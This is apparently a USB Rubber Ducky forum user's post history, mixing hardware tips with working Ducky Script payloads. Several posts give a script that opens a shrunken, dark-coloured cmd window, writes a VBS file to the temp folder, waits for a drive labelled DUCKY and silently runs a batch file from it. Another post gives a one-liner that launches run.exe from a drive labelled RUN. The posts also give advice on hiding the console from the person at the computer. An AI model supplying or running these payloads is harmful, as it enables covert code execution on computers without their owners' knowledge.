White Light
-
Posts
67 -
Joined
-
Last visited
-
Days Won
2
Posts posted by White Light
-
-
Many stores sell them where I live, especially those meant to be for birthdays or special occasions. Often they have a gift box logo on them so they appear even more like a present you'd give to a kid making their first online purchases.
-
The ducky is just a keyboard, the interaction can only go one-way. There is no way to detect version number automatically with it.
-
Keep in mind, the ducky is only a programmable keyboard. What keystrokes work on one OS, such as Windows 7, might not necessarily do the same function on another, such as Windows 10. This is why I don't use generators, so I can write my own that I know will work on whichever OS (or multiple) I choose.
-
The ducky can do only what you can do with a keyboard on your own, it just allows you to automate the process. If you can download something over SFTP using just your keyboard, then you can do it with a ducky.
-
The issue may very well just be that the script is incorrect. Remember: The ducky is simply a programmable keyboard - it will do what you tell it to do, when you tell it to do it, and nothing else. Try to duplicate exactly what your script is telling the ducky to do, and focus on things that may require extra delays.
-
Hey Adam (funny seeing you here, eh?). You should make it so that it will be able to detect which drive letter the SD/ducky is on so you don't have to manually select it. In my auto-build script, I just check for the drive label (which I know, because I use it in the ducky code).
-
I have the SD reader and my flash drive "goodie bag" attached to a bent paper clip that I use to pop open the ducky case.
-
(Might be best to be patient with replies. This is a pretty quiet board.)
I've noticed that a longer initial delay helps with the driver issue. Usually about 4s does the trick, though it depends on the speed of the computer. It seems to me that if it tries to type while the drivers are still installing, it just skips it and will keep typing the rest of your script until that happens. Other than that, why not just plug it in again after the driver has installed?
-
Here's the VBS code I've been working on, along with the modified CMD string.
REM DEFAULT_DELAY 20 DELAY 2000 GUI r DELAY 100 STRING cmd /T:01 /K mode con cols=15 lines=1©/y con %tmp%\z.vbs ENTER DELAY 300 STRING on error resume next:Set s = GetObject("winmgmts:"):d="":do while d="" ENTER STRING Set c = s.ExecQuery("Select * from Win32_Volume Where Label='DUCKY'"):set o=c.ItemIndex(0):d=o.Name ENTER STRING if d="" then wscript.sleep 500 ENTER STRING loop ENTER STRING Set w = WScript.CreateObject("WScript.Shell"):w.Run d&"\r.bat", 1 , false ENTER DELAY 10 CTRL z ENTER DELAY 50 STRING start "" %tmp%\z.vbs&exit ENTERWeird, it didn't include everything I typed after the code. I really can't be bothered to type out all that again, but I'll summarize.
Some CMD switches don't do much or nothing at all. I've included only the ones necessary.
Making the window smaller using mode instead of moving it is probably less noticeable. Moving to the left is better than down, as the window generally spawns in upper-left side of screen.
VBS code runs silent, loops until it finds the drive named "DUCKY".
90% certain VBS code will work on all XP versions and above. If it won't work on something, it'll be XP Home.
-
Here's the VBS code I've been working on, along with the modified CMD string.
REM DEFAULT_DELAY 20 DELAY 2000 GUI r DELAY 100 STRING cmd /T:01 /K mode con cols=15 lines=1©/y con %tmp%\z.vbs ENTER DELAY 300 STRING on error resume next:Set s = GetObject("winmgmts:"):d="":do while d="" ENTER STRING Set c = s.ExecQuery("Select * from Win32_Volume Where Label='DUCKY'"):set o=c.ItemIndex(0):d=o.Name ENTER STRING if d="" then wscript.sleep 500 ENTER STRING loop ENTER STRING Set w = WScript.CreateObject("WScript.Shell"):w.Run d&"\r.bat", 1 , false ENTER DELAY 10 CTRL z ENTER DELAY 50 STRING start "" %tmp%\z.vbs&exit ENTER -
If you look, it actually only uses diskpart on XP (as XP home doesn't have access to the WMI console). Everything else is all just done in one command. If you were to run CMD and have the above run via the command line directly, the box would be visible only for the amount of time necessary to either query diskpart or WMIC (a few seconds at most).
Ducks only seem to mount the FS slowly the first time it is plugged into a computer, making testing timings difficult. I've got a work-in-progress using VBS to loop in the background waiting for the drive to load, which means that timing wouldn't ever be an issue. In the mean time, I would suggest that instead of using
cmd /Q /D /T:7F /F:OFF /V:ON /K
you could try changing the colour setting to something with two dark settings, like 01 (if my memory serves that's dark blue on black background). You could also try reducing the console size to the bare minimum (1 line and somewhere between 10-18 columns, I can never remember).cmd /Q /D /T:01 /F:OFF /V:ON /K mode con cols=18 lines=1
Please forgive any mistakes. I'm on mobile right now, so I can't exactly test the syntax of the mode command. -
Personally, I would do something like this, to avoid having to loop through each drive letter:
for /f "tokens=3" %v in ('ver') do if %v==XP (for /f "tokens=3" %a in ('echo list volume ^| diskpart ^| find "Volume" ^| find "RUN"') do start "" %a:\run.exe) else (for /f %a in ('wmic logicaldisk get volumename^,name ^| find "RUN"') do start "" %a\run.exe)Works on Windows XP using diskpart as well as Vista+ using wmic.
are there WIndows 10 payload generators?
in Classic USB Rubber Ducky
Posted
You can use different firmwares to do different things. One allows you to use the ducky as a keyboard AND a mass storage device. Check the wiki for the links to that.